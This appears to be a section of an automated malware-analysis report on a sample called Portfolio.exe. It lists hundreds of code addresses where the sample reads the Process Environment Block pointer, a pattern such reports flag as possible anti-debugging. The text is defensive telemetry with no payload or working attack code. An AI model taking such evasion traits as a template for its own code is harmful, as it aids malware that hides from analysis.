Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]	3_2_01982D8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]	3_2_01982D8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]	3_2_01982D8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]	3_2_01982D8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]	3_2_01982D8A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AC182 mov eax, dword ptr fs:[00000030h]	3_2_019AC182
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]	3_2_019B2581
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]	3_2_019B2581
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]	3_2_019B2581
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]	3_2_019B2581
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA185 mov eax, dword ptr fs:[00000030h]	3_2_019BA185
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]	3_2_01A051BE
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]	3_2_01A051BE
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]	3_2_01A051BE
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]	3_2_01A051BE
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]	3_2_019B1DB5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]	3_2_019B1DB5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]	3_2_019B1DB5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B35A1 mov eax, dword ptr fs:[00000030h]	3_2_019B35A1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]	3_2_019B61A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]	3_2_019B61A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]	3_2_01A4FDE2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]	3_2_01A4FDE2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]	3_2_01A4FDE2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]	3_2_01A4FDE2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A141E8 mov eax, dword ptr fs:[00000030h]	3_2_01A141E8
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A38DF1 mov eax, dword ptr fs:[00000030h]	3_2_01A38DF1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]	3_2_01A06DC9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0198B1E1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0198B1E1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0198B1E1
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0199D5E0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0199D5E0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58D34 mov eax, dword ptr fs:[00000030h]	3_2_01A58D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A0A537 mov eax, dword ptr fs:[00000030h]	3_2_01A0A537
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]	3_2_01989100
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]	3_2_01989100
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]	3_2_01989100
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4E539 mov eax, dword ptr fs:[00000030h]	3_2_01A4E539
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]	3_2_019B4D3B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]	3_2_019B4D3B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]	3_2_019B4D3B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]	3_2_019B513A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]	3_2_019B513A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198AD30 mov eax, dword ptr fs:[00000030h]	3_2_0198AD30
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]	3_2_01993D34
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A4120 mov ecx, dword ptr fs:[00000030h]	3_2_019A4120
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A7D50 mov eax, dword ptr fs:[00000030h]	3_2_019A7D50
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]	3_2_019AB944
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]	3_2_019AB944
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C3D43 mov eax, dword ptr fs:[00000030h]	3_2_019C3D43
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A03540 mov eax, dword ptr fs:[00000030h]	3_2_01A03540
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]	3_2_0198B171
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]	3_2_0198B171
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]	3_2_019AC577
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]	3_2_019AC577
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198C962 mov eax, dword ptr fs:[00000030h]	3_2_0198C962
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199849B mov eax, dword ptr fs:[00000030h]	3_2_0199849B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01989080 mov eax, dword ptr fs:[00000030h]	3_2_01989080
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BF0BF mov ecx, dword ptr fs:[00000030h]	3_2_019BF0BF
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]	3_2_019BF0BF
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]	3_2_019BF0BF
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]	3_2_01A03884
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]	3_2_01A03884
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C90AF mov eax, dword ptr fs:[00000030h]	3_2_019C90AF
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]	3_2_019B20A0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]	3_2_01A06CF0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]	3_2_01A06CF0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]	3_2_01A06CF0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A414FB mov eax, dword ptr fs:[00000030h]	3_2_01A414FB
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1B8D0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58CD6 mov eax, dword ptr fs:[00000030h]	3_2_01A58CD6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019858EC mov eax, dword ptr fs:[00000030h]	3_2_019858EC
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]	3_2_01A41C06
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]	3_2_01A5740D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]	3_2_01A5740D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]	3_2_01A5740D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]	3_2_01A06C0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]	3_2_01A06C0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]	3_2_01A06C0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]	3_2_01A06C0A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A54015 mov eax, dword ptr fs:[00000030h]	3_2_01A54015
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A54015 mov eax, dword ptr fs:[00000030h]	3_2_01A54015
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]	3_2_0199B02A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]	3_2_0199B02A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]	3_2_0199B02A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]	3_2_0199B02A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]	3_2_01A07016
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]	3_2_01A07016
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]	3_2_01A07016
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]	3_2_019B002D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]	3_2_019B002D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]	3_2_019B002D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]	3_2_019B002D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]	3_2_019B002D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BBC2C mov eax, dword ptr fs:[00000030h]	3_2_019BBC2C
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A0050 mov eax, dword ptr fs:[00000030h]	3_2_019A0050
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A0050 mov eax, dword ptr fs:[00000030h]	3_2_019A0050
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA44B mov eax, dword ptr fs:[00000030h]	3_2_019BA44B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A51074 mov eax, dword ptr fs:[00000030h]	3_2_01A51074
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A42073 mov eax, dword ptr fs:[00000030h]	3_2_01A42073
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1C450 mov eax, dword ptr fs:[00000030h]	3_2_01A1C450
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1C450 mov eax, dword ptr fs:[00000030h]	3_2_01A1C450
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019A746D mov eax, dword ptr fs:[00000030h]	3_2_019A746D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A55BA5 mov eax, dword ptr fs:[00000030h]	3_2_01A55BA5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BB390 mov eax, dword ptr fs:[00000030h]	3_2_019BB390
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2397 mov eax, dword ptr fs:[00000030h]	3_2_019B2397
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01998794 mov eax, dword ptr fs:[00000030h]	3_2_01998794
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01991B8F mov eax, dword ptr fs:[00000030h]	3_2_01991B8F
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01991B8F mov eax, dword ptr fs:[00000030h]	3_2_01991B8F
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A3D380 mov ecx, dword ptr fs:[00000030h]	3_2_01A3D380
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4138A mov eax, dword ptr fs:[00000030h]	3_2_01A4138A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]	3_2_01A07794
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]	3_2_01A07794
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]	3_2_01A07794
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]	3_2_019B4BAD
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]	3_2_019B4BAD
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]	3_2_019B4BAD
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C37F5 mov eax, dword ptr fs:[00000030h]	3_2_019C37F5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A053CA mov eax, dword ptr fs:[00000030h]	3_2_01A053CA
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A053CA mov eax, dword ptr fs:[00000030h]	3_2_01A053CA
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019ADBE9 mov eax, dword ptr fs:[00000030h]	3_2_019ADBE9
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]	3_2_019B03E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019AF716 mov eax, dword ptr fs:[00000030h]	3_2_019AF716
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA70E mov eax, dword ptr fs:[00000030h]	3_2_019BA70E
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BA70E mov eax, dword ptr fs:[00000030h]	3_2_019BA70E
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A5070D mov eax, dword ptr fs:[00000030h]	3_2_01A5070D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A5070D mov eax, dword ptr fs:[00000030h]	3_2_01A5070D
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BE730 mov eax, dword ptr fs:[00000030h]	3_2_019BE730
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1FF10 mov eax, dword ptr fs:[00000030h]	3_2_01A1FF10
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1FF10 mov eax, dword ptr fs:[00000030h]	3_2_01A1FF10
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01984F2E mov eax, dword ptr fs:[00000030h]	3_2_01984F2E
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01984F2E mov eax, dword ptr fs:[00000030h]	3_2_01984F2E
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A4131B mov eax, dword ptr fs:[00000030h]	3_2_01A4131B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198F358 mov eax, dword ptr fs:[00000030h]	3_2_0198F358
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58F6A mov eax, dword ptr fs:[00000030h]	3_2_01A58F6A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198DB40 mov eax, dword ptr fs:[00000030h]	3_2_0198DB40
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199EF40 mov eax, dword ptr fs:[00000030h]	3_2_0199EF40
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B3B7A mov eax, dword ptr fs:[00000030h]	3_2_019B3B7A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B3B7A mov eax, dword ptr fs:[00000030h]	3_2_019B3B7A
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0198DB60 mov ecx, dword ptr fs:[00000030h]	3_2_0198DB60
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199FF60 mov eax, dword ptr fs:[00000030h]	3_2_0199FF60
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58B58 mov eax, dword ptr fs:[00000030h]	3_2_01A58B58
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]	3_2_01A50EA5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]	3_2_01A50EA5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]	3_2_01A50EA5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A046A7 mov eax, dword ptr fs:[00000030h]	3_2_01A046A7
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BD294 mov eax, dword ptr fs:[00000030h]	3_2_019BD294
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BD294 mov eax, dword ptr fs:[00000030h]	3_2_019BD294
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A1FE87 mov eax, dword ptr fs:[00000030h]	3_2_01A1FE87
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0199AAB0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0199AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0199AAB0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BFAB0 mov eax, dword ptr fs:[00000030h]	3_2_019BFAB0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]	3_2_019852A5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]	3_2_019852A5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]	3_2_019852A5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]	3_2_019852A5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]	3_2_019852A5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2ACB mov eax, dword ptr fs:[00000030h]	3_2_019B2ACB
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B36CC mov eax, dword ptr fs:[00000030h]	3_2_019B36CC
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019C8EC7 mov eax, dword ptr fs:[00000030h]	3_2_019C8EC7
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A3FEC0 mov eax, dword ptr fs:[00000030h]	3_2_01A3FEC0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A58ED6 mov eax, dword ptr fs:[00000030h]	3_2_01A58ED6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B16E0 mov ecx, dword ptr fs:[00000030h]	3_2_019B16E0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019976E2 mov eax, dword ptr fs:[00000030h]	3_2_019976E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2AE4 mov eax, dword ptr fs:[00000030h]	3_2_019B2AE4
